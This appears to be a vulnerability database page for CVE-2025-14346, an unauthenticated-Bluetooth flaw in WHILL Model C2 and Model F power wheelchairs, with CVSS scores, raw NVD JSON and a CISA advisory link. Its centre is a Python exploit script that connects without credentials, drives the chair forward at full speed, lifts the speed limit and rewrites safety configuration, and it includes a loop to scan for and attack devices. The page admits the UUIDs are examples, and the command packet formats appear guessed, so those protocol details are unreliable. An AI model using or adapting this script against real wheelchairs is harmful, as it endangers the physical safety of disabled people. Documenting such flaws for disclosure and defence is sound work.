Security Vulnerability Report
CVE-2025-14346 CVSS 9.8 CRITICAL

CVE-2025-14346

Published: 2026-01-05 16:15:42
Last Modified: 2026-04-15 00:35:42

Description

WHILL Model C2 Electric Wheelchairs and Model F Power Chairs do not enforce authentication for Bluetooth connections. An attacker within range can pair with the device and issue movement commands, override speed restrictions, and manipulate configuration profiles without any credentials or user interaction.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WHILL Model C2 (all versions)
WHILL Model F (all versions)

PoC / Exploit Code

⚠ For Security Research Only
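The following code is for security research and authorized testing only. Its own comment marks the service and characteristic UUIDs as examples ("actual UUIDs may vary"), so read the listing as an illustration of the missing-authentication weakness (CWE-306) rather than as a verified description of the device protocol.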
python
#!/usr/bin/env python3 """ CVE-2025-14346 PoC - WHILL Wheelchair Bluetooth Unauthenticated Access This PoC demonstrates the lack of authentication in WHILL wheelchair Bluetooth pairing. Note: This is for educational and security research purposes only. """ import asyncio from bleak import BleakClient import struct TARGET_DEVICE_NAME = "WHILL" # Default WHILL service UUIDs (example - actual UUIDs may vary) WHILL_CONTROL_SERVICE = "0000fff0-0000-1000-8000-00805f9b34fb" WHILL_CONTROL_CHAR = "0000fff1-0000-1000-8000-00805f9b34fb" def create_move_command(direction, speed, duration): """Create a MOVE command packet for WHILL wheelchair control.""" # Command structure: [CMD_TYPE, DIR, SPEED, DURATION] # DIR: 0x01=forward, 0x02=backward, 0x03=left, 0x04=right cmd_type = 0x01 # MOVE command return struct.pack('BBBB', cmd_type, direction, speed, duration) def create_speed_override_command(max_speed): """Create a SPEED_OVERRIDE command to bypass speed limits.""" cmd_type = 0x02 # SPEED_OVERRIDE command return struct.pack('BBH', cmd_type, 0x01, max_speed) async def exploit_cve_2025_14346(device_address): """ Exploit CVE-2025-14346: Unauthenticated Bluetooth access to WHILL wheelchair. """ print(f"[*] Connecting to WHILL device: {device_address}") try: async with BleakClient(device_address) as client: # No authentication required - this is the vulnerability print("[+] Connected successfully without authentication") # Discover services services = await client.get_services() print(f"[*] Discovered {len(services.services)} services") # Find control service control_service = services.get_service(WHILL_CONTROL_SERVICE) if not control_service: print("[!] 
Control service not found, scanning...") for service in services.services.values(): print(f" Service: {service.uuid}") return False # Get control characteristic control_char = control_service.get_characteristic(WHILL_CONTROL_CHAR) # Attack 1: Send arbitrary movement command print("[*] Sending MOVE command (forward, max speed)") move_cmd = create_move_command(0x01, 0xFF, 0xFF) await client.write_gatt_char(control_char.uuid, move_cmd) print("[+] Movement command sent successfully") # Attack 2: Override speed restrictions print("[*] Overriding speed limit to maximum") speed_cmd = create_speed_override_command(0xFFFF) await client.write_gatt_char(control_char.uuid, speed_cmd) print("[+] Speed limit bypassed") # Attack 3: Modify configuration print("[*] Modifying safety configuration") config_cmd = bytes([0x03, 0x00, 0x00, 0x00]) # CONFIG_WRITE await client.write_gatt_char(control_char.uuid, config_cmd) print("[+] Configuration modified") print("[!] Exploitation complete - device fully compromised") return True except Exception as e: print(f"[-] Error: {e}") return False async def scan_and_exploit(): """Scan for vulnerable WHILL devices and exploit them.""" print("[*] Scanning for WHILL devices...") # Use bluetoothctl or hcitool for scanning # Example: hcitool lescan | grep WHILL # For demonstration, list discovered devices devices = [ "XX:XX:XX:XX:XX:XX" # Replace with actual device MAC ] for device in devices: await exploit_cve_2025_14346(device) if __name__ == "__main__": asyncio.run(scan_and_exploit())

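References

CISA ICS Medical Advisory ICSMA-25-364-01: https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-364-01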

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14346", "sourceIdentifier": "[email protected]", "published": "2026-01-05T16:15:41.843", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "WHILL Model C2 Electric Wheelchairs and Model F Power Chairs do not enforce authentication for Bluetooth connections. An attacker within range can pair with the device and issue movement commands, override speed restrictions, and manipulate configuration profiles without any credentials or user interaction."}, {"lang": "es", "value": "Las sillas de ruedas eléctricas WHILL Modelo C2 y las sillas de ruedas motorizadas Modelo F no aplican autenticación para las conexiones Bluetooth. Un atacante dentro del alcance puede emparejarse con el dispositivo y emitir comandos de movimiento, anular las restricciones de velocidad y manipular perfiles de configuración sin credenciales ni interacción del usuario."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-364-01", "source": "[email protected]"}]}}